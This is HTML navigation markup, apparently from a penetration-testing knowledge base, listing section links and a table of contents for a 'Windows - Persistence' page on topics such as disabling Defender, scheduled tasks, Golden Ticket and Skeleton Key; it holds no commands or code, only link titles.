<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_1" >
<label class="md-nav__link" for="__nav_4_1" id="__nav_4_1_label" tabindex="0">
<span class="md-ellipsis">
Aws
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_1">
<span class="md-nav__icon md-icon"></span>
Aws
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-access-token/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Access Token &amp; Secrets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-cli/" class="md-nav__link">
<span class="md-ellipsis">
AWS - CLI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-cognito/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Cognito
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-dynamodb/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - DynamoDB
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ec2/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - EC2
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-iam/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Identity &amp; Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ioc-detection/" class="md-nav__link">
<span class="md-ellipsis">
AWS - IOC &amp; Detections
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-lambda/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Lambda &amp; API Gateway
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-metadata/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Metadata SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-s3-bucket/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - S3 Buckets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ssm/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - SSM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-training/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Training
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
<label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
<span class="md-ellipsis">
Azure
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_2">
<span class="md-nav__icon md-icon"></span>
Azure
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/azure/aka-ms/" class="md-nav__link">
<span class="md-ellipsis">
aka.ms Shortcuts
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-access-and-token/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Access and Tokens
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-ad-conditional-access-policy/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Conditional Access Policy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-ad-connect/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - AD Connect and Cloud Sync
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-devices-users-sp/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - IAM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-phishing/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-requirements/" class="md-nav__link">
<span class="md-ellipsis">
Azure - Requirements
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-application-endpoint/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-application-proxy/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-container-registry/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Container Registry
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-deployment-template/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Deployment Template
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-keyvault/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - KeyVault
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-microsoft-intune/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Microsoft Intune
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-office-365/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Office 365
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-runbook/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Runbook and Automation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-storage-blob/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Storage Blob
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-virtual-machine/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Virtual Machine
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-web-apps/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Web Apps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/azure/azure-services-web-domains/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - DNS Suffix
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
<label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
<span class="md-ellipsis">
Ibm
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_3">
<span class="md-nav__icon md-icon"></span>
Ibm
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/ibm/ibm-cloud-databases/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Managed Database Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/ibm/ibm-cloud-object-storage/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Object Storage
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Command control
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Command control
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike-beacons/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Beacons
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike-kits/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Kits
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/cobalt-strike/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../command-control/metasploit/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Containers
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Containers
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../containers/docker/" class="md-nav__link">
<span class="md-ellipsis">
Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../containers/kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Databases
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Databases
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../databases/mssql-audit-checks/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Audit Checks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-command-execution/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-credentials/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Database Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../databases/mssql-linked-database/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Linked Database
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
Devops
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
Devops
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../devops/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/azure-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/buildkite/" class="md-nav__link">
<span class="md-ellipsis">
BuildKite
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/circle-ci/" class="md-nav__link">
<span class="md-ellipsis">
CircleCI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/drone-ci/" class="md-nav__link">
<span class="md-ellipsis">
Drone CI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../devops/github-actions/" class="md-nav__link">
<span class="md-ellipsis">
GitHub Actions
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
Methodology
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
Methodology
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../methodology/android-applications/" class="md-nav__link">
<span class="md-ellipsis">
Android Application
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/bug-hunting-methodology/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/source-code-analysis/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Analysis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../methodology/vulnerability-reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" checked>
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Redteam
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Redteam
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_1" >
<label class="md-nav__link" for="__nav_10_1" id="__nav_10_1_label" tabindex="0">
<span class="md-ellipsis">
Access
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_1">
<span class="md-nav__icon md-icon"></span>
Access
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../access/html-smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/initial-access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/office-attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/phishing/" class="md-nav__link">
<span class="md-ellipsis">
Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/web-attack-surface/" class="md-nav__link">
<span class="md-ellipsis">
Web Attack Surface
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/windows-download-execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../access/windows-using-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_2" >
<label class="md-nav__link" for="__nav_10_2" id="__nav_10_2_label" tabindex="0">
<span class="md-ellipsis">
Escalation
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_2">
<span class="md-nav__icon md-icon"></span>
Escalation
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../escalation/linux-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../escalation/windows-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_3" >
<label class="md-nav__link" for="__nav_10_3" id="__nav_10_3_label" tabindex="0">
<span class="md-ellipsis">
Evasion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_3">
<span class="md-nav__icon md-icon"></span>
Evasion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../evasion/edr-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Endpoint Detection and Response
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/elastic-edr/" class="md-nav__link">
<span class="md-ellipsis">
Elastic EDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/linux-evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-amsi-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../evasion/windows-dpapi/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_4" checked>
<label class="md-nav__link" for="__nav_10_4" id="__nav_10_4_label" tabindex="0">
<span class="md-ellipsis">
Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_4_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_10_4">
<span class="md-nav__icon md-icon"></span>
Persistence
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../linux-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../rdp-persistence/" class="md-nav__link">
<span class="md-ellipsis">
RDP - Persistence
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Windows - Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#hide-your-binary" class="md-nav__link">
<span class="md-ellipsis">
Hide Your Binary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-antivirus-and-security" class="md-nav__link">
<span class="md-ellipsis">
Disable Antivirus and Security
</span>
</a>
<nav class="md-nav" aria-label="Disable Antivirus and Security">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#antivirus-removal" class="md-nav__link">
<span class="md-ellipsis">
Antivirus Removal
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-defender" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Defender
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-firewall" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Firewall
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#clear-system-and-security-logs" class="md-nav__link">
<span class="md-ellipsis">
Clear System and Security Logs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#simple-user" class="md-nav__link">
<span class="md-ellipsis">
Simple User
</span>
</a>
<nav class="md-nav" aria-label="Simple User">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hkcu" class="md-nav__link">
<span class="md-ellipsis">
Registry HKCU
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#startup" class="md-nav__link">
<span class="md-ellipsis">
Startup
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-user" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bits-jobs" class="md-nav__link">
<span class="md-ellipsis">
BITS Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#serviceland" class="md-nav__link">
<span class="md-ellipsis">
Serviceland
</span>
</a>
<nav class="md-nav" aria-label="Serviceland">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iis" class="md-nav__link">
<span class="md-ellipsis">
IIS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-service" class="md-nav__link">
<span class="md-ellipsis">
Windows Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#elevated" class="md-nav__link">
<span class="md-ellipsis">
Elevated
</span>
</a>
<nav class="md-nav" aria-label="Elevated">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hklm" class="md-nav__link">
<span class="md-ellipsis">
Registry HKLM
</span>
</a>
<nav class="md-nav" aria-label="Registry HKLM">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#winlogon-helper-dll" class="md-nav__link">
<span class="md-ellipsis">
Winlogon Helper DLL
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#globalflag" class="md-nav__link">
<span class="md-ellipsis">
GlobalFlag
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#startup-elevated" class="md-nav__link">
<span class="md-ellipsis">
Startup Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#services-elevated" class="md-nav__link">
<span class="md-ellipsis">
Services Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#servicesecuritydescriptor" class="md-nav__link">
<span class="md-ellipsis">
ServiceSecurityDescriptor
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-elevated" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-management-instrumentation-event-subscription" class="md-nav__link">
<span class="md-ellipsis">
Windows Management Instrumentation Event Subscription
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement
</span>
</a>
<nav class="md-nav" aria-label="Binary Replacement">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-xp" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows XP+
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-10" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows 10+
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#skeleton-key" class="md-nav__link">
<span class="md-ellipsis">
Skeleton Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#virtual-machines" class="md-nav__link">
<span class="md-ellipsis">
Virtual Machines
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-subsystem-for-linux" class="md-nav__link">
<span class="md-ellipsis">
Windows Subsystem for Linux
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#domain" class="md-nav__link">
<span class="md-ellipsis">
Domain
</span>
</a>
<nav class="md-nav" aria-label="Domain">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#user-certificate" class="md-nav__link">
<span class="md-ellipsis">
User Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-certificate" class="md-nav__link">
<span class="md-ellipsis">
Golden Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-ticket" class="md-nav__link">
<span class="md-ellipsis">
Golden Ticket
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#laps-persistence" class="md-nav__link">
<span class="md-ellipsis">
LAPS Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_5" >
<label class="md-nav__link" for="__nav_10_5" id="__nav_10_5_label" tabindex="0">
<span class="md-ellipsis">
Pivoting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_5">
<span class="md-nav__icon md-icon"></span>
Pivoting
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../pivoting/network-pivoting-techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#hide-your-binary" class="md-nav__link">
<span class="md-ellipsis">
Hide Your Binary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-antivirus-and-security" class="md-nav__link">
<span class="md-ellipsis">
Disable Antivirus and Security
</span>
</a>
<nav class="md-nav" aria-label="Disable Antivirus and Security">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#antivirus-removal" class="md-nav__link">
<span class="md-ellipsis">
Antivirus Removal
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-defender" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Defender
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#disable-windows-firewall" class="md-nav__link">
<span class="md-ellipsis">
Disable Windows Firewall
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#clear-system-and-security-logs" class="md-nav__link">
<span class="md-ellipsis">
Clear System and Security Logs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#simple-user" class="md-nav__link">
<span class="md-ellipsis">
Simple User
</span>
</a>
<nav class="md-nav" aria-label="Simple User">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hkcu" class="md-nav__link">
<span class="md-ellipsis">
Registry HKCU
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#startup" class="md-nav__link">
<span class="md-ellipsis">
Startup
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-user" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bits-jobs" class="md-nav__link">
<span class="md-ellipsis">
BITS Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#serviceland" class="md-nav__link">
<span class="md-ellipsis">
Serviceland
</span>
</a>
<nav class="md-nav" aria-label="Serviceland">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iis" class="md-nav__link">
<span class="md-ellipsis">
IIS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-service" class="md-nav__link">
<span class="md-ellipsis">
Windows Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#elevated" class="md-nav__link">
<span class="md-ellipsis">
Elevated
</span>
</a>
<nav class="md-nav" aria-label="Elevated">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#registry-hklm" class="md-nav__link">
<span class="md-ellipsis">
Registry HKLM
</span>
</a>
<nav class="md-nav" aria-label="Registry HKLM">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#winlogon-helper-dll" class="md-nav__link">
<span class="md-ellipsis">
Winlogon Helper DLL
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#globalflag" class="md-nav__link">
<span class="md-ellipsis">
GlobalFlag
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#startup-elevated" class="md-nav__link">
<span class="md-ellipsis">
Startup Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#services-elevated" class="md-nav__link">
<span class="md-ellipsis">
Services Elevated
</span>
</a>
</li>
<li class="md-nav__item">
